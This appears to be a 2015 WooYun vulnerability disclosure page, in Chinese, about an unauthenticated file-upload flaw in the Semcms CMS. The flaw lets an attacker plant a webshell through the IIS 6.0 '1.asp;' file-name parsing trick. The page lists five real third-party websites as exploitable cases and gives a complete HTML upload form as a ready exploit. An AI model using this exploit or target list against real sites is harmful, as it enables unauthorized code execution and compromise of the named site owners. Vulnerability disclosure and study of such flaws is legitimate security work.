当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112733

漏洞标题:Semcms Upload Vulnerability

相关厂商:Semcms

漏洞作者: 路人甲

提交时间:2015-05-14 17:46

修复时间:2015-06-28 17:48

公开时间:2015-06-28 17:48

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:11

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

无需登录,构造表单可直接通过IIS6.0解析漏洞获取webshell
官网: 

http://www.sem-cms.com/ SemCms外贸网站管理系统官方网!


Upload Vulnerability:

/clkj_admin/upfile.asp 构造表单自定义名称为1.asp;可造成解析漏洞


Case:

http://www.yikai-auto.com/clkj_admin/upfile.asp
http://progloballight.com/clkj_admin/upfile.asp
http://www.1dragon.net/clkj_admin/upfile.asp
http://www.stdfled.com//clkj_admin/upfile.asp
http://www.apexcool.com/clkj_admin/upfile.asp


EXP:(该漏洞危害较大;请勿使用该漏洞进行非法用途;否则后果自负!)

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link href="backdoor.css" type="text/css" rel="stylesheet">
<script language="javascript">
<!--
function mysub()
{
		esave.style.visibility="visible";
}
-->
</script>
</head>
<body>
<form name="form1" method="post" action="http://www.******.com//clkj_admin/upfile.asp" enctype="multipart/form-data" >
  <div id="esave" style="position:absolute; top:18px; left:40px; z-index:10; visibility:hidden">
    <TABLE WIDTH=340 BORDER=0 CELLSPACING=0 CELLPADDING=0>
      <TR>
        <td width=20%></td>
        <TD bgcolor=#ff0000 width="60%"><TABLE WIDTH=100% height=120 BORDER=0 CELLSPACING=1 CELLPADDING=0>
            <TR>
              <td bgcolor=#ffffff align=center><font color=red>正在上传文件,请稍候...</font></td>
            </tr>
          </table></td>
        <td width=20%></td>
      </tr>
    </table>
  </div>
  <table width="95%" border="0" align="center" cellspacing="1" bgcolor="#FFFFFF">
    <tr>
      <td align="center" height="50">
	  <strong>图片上传</strong>
        <input type="hidden" name="filepath" value="../Clkj_Images/upfile/">
        <input type="hidden" name="filelx" value="jpg">
        <input type="hidden" name="EditName" value="clkj_prpic_1">
        <input type="hidden" name="FormName" value="products">
        <input type="hidden" name="act" value="uploadfile">
         </td>
    </tr>
    <tr >
      <td align="center" id="upid" height="30">自定义图片名称
        <input name="imgname" type="text" id="imgname" size="20" class="tx1" >
        <font color="#FF0000">注意:此项为空即,随机生成图片文件名</font> </td>
    </tr>
    <tr >
      <td align="center" id="upid" height="50">选择文件:
        <input type="file" name="file1" size="45" class="tx1" value="">
        <input type="submit" name="Submit" value="开始上传" onClick="javascript:mysub()">
      </td>
    </tr>
  </table>
</form>
</body>
</html>

漏洞证明:

任意互联网案例测试

1、
01.jpg







02.jpg







03.jpg


修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝